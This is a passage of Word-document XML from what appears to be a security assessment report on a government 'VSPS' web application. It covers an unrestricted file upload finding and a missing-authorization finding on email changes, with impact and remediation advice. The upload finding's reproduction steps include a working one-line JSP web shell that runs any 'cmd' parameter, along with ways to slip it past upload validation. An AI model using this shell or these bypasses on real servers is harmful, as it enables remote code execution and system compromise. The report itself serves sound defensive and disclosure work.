          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Validate file extensions using a strict whitelist of allowed extensions (e.g., only '.pdf', '.jpg', '.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' if only images are expected). Never rely on client-side validation alone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6216F916" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Verify the file's true MIME type by inspecting its magic bytes (file header) in addition to checking the Content-Type HTTP header, as the latter can be easily spoofed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265EAAF1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Rename uploaded files to a secure, non-predictable name (e.g., a hash or UUID) to prevent path traversal and ensure original filenames do not introduce execution risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D0B340" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Store uploaded files in a directory that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> not directly accessible via the web server or configure the web server to explicitly deny execution permissions for files within upload directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19794D9B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Implement server-side checks for file size limits to prevent denial-of-service attacks and ensure that files are scanned for malicious content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA3055B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521149ED" w14:textId="7EEF8AF3" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Identify a file upload functionality within the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application, typically found in profile updates, document submissions, or content management sections. 2. Create a simple web shell file for the server's technology (e.g., '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shell.jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' for a Java server, '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' for a PHP server, 'shell.sh' for a Linux server). An example '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shell.jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">' could contain: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;%@</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>page import="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java.io.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"%&gt; &lt;% </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Runtime.getRuntime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).exec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>")); %&gt; 3. Attempt to upload this malicious file through the identified functionality. If direct upload is blocked, try bypassing validation by:    - Renaming the file extension (e.g., 'shell.jsp.txt', 'shell.jsp%00.jpg').    - Intercepting the HTTP request with a proxy (e.g., Burp Suite) and modifying the 'Content-Type' header to an allowed type (e.g., 'image/jpeg') while keeping the malicious content and dangerous extension. 4. Observe the server's response for the upload location or filename. 5. Access the uploaded malicious file via a web browser at its presumed URL (e.g., 'https://vsp.example.gov/uploads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shell.jsp?cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=ls%20-la'). 6. Confirm remote code execution by observing the output of the executed command (e.g., a directory listing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4DE914" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F39841" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4324D659" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/434.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773FDAE9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvd.nist.gov/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BE20E4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://portswigger.net/web-security/file-upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0400BB99" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B299E39"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063CFA5F"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76A7A8AD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Missing Authorization for Sensitive Action (Email Modification)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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18FEE8FD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>CRITICAL CVSS 9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C5DB46C"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74935A5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1DF8FFD"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8A3C762" w14:textId="6210DA8C"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027</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E24D8B7"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69A9D5B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.1 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="3BCE4A7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3FE855D"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64F2A0F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A01:2021-Broken Access Control</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60D6329"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AA1C9FA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-863</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="40A26D6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40CB955"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72EF1DC"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F0141B0"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E41E2B0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="20A9E19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24BDED0"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3AF9599"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20AE5BA"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71BCD91" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="765A410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040DE69"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3A13996"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B2B085C"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CEC753B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="5EA57ED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F7DBF9F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4250" w:type="pct"/>
            <w:gridSpan w:val="3"/>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tcPr>
          <w:p w14:paraId="162D3060" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>https://nvd.nist.gov/vuln/detail/CVE-2023-28157, https://nvd.nist.gov/vuln/detail/CVE-2007-6202</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E00894E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A01E79" w14:textId="10342E04" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application, which utilizes Struts 1, fails to enforce proper authorization checks for the email modification functionality. An authenticated user, despite organizational policy dictating that email changes must be performed via the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eAuth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identity Management (IDM) system, can successfully update their email address directly within the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">portal. This vulnerability arises from the application not verifying if the authenticated user possesses the necessary privileges or if the action conforms to established business rules (e.g., redirection to the IDM). Exploitation occurs when an authenticated attacker submits a request to modify an email address, and the application processes this request without adequate server-side authorization checks. This bypass allows users to alter critical account information outside of the approved, centralized IDM process, leading to potential data inconsistency, circumvention of enterprise security policies, and, in more severe scenarios, could facilitate account takeover if the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application's email is used for password recovery or other sensitive operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABDD715" w14:textId="3D469145" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF11346" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This authorization bypass poses significant risks to the organization, particularly given its government industry context and NIST CSF compliance requirements. Unauthorized email modification can lead to severe data integrity issues and compromise the accuracy of user identities across systems. If an attacker can alter email addresses, they could potentially hijack accounts by initiating password resets, leading to a full account compromise and access to sensitive government data. This could result in substantial financial losses due to remediation efforts, regulatory fines (potentially impacting budget allocations), and significant reputational damage affecting public trust. Non-compliance with NIST CSF for access control and identity management could lead to audit failures and severe operational disruptions. The integrity of citizen data and government operations relies heavily on accurate and securely managed identity information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7D4BAE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CD3796" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DA6C8D" w14:textId="78E7D9E1" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Implement a robust, centralized access control framework that consistently applies authorization policies across all sensitive actions within the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">application. This framework should be designed to integrate seamlessly with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eAuth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> IDM as the authoritative source for identity and authorization decisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34834F1D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">- Adopt a 'deny-by-default' authorization strategy, ensuring that all actions require explicit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>permissions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Transition away from the legacy Struts 1 framework, which is End-of-Life, to a modern framework that inherently supports stronger security controls and is actively maintained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7EE8F9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BBC5F57" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A26001" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- For the email modification functionality, implement strict server-side authorization checks for every request. Before processing an email change, the application must verify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0449C036" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  - The user is authorized to perform the action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5F93CA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  - The request originates from or is consistent with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eAuth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> IDM process as per policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B55A64" w14:textId="6B2A245E" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Implement a redirection mechanism that automatically routes users attempting to change their email in the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">portal to the designated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eAuth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> IDM system, preventing direct modification within the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D597608" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Ensure that all sensitive parameters (such as user IDs or email addresses) are not directly exposed or manipulable client-side. Utilize session-based or server-side managed identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C120A97" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Conduct a thorough review of all other sensitive actions within the application to identify and remediate similar authorization bypass vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2D1C18" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9BAB5F" w14:textId="11D4BF01" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Log in to the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
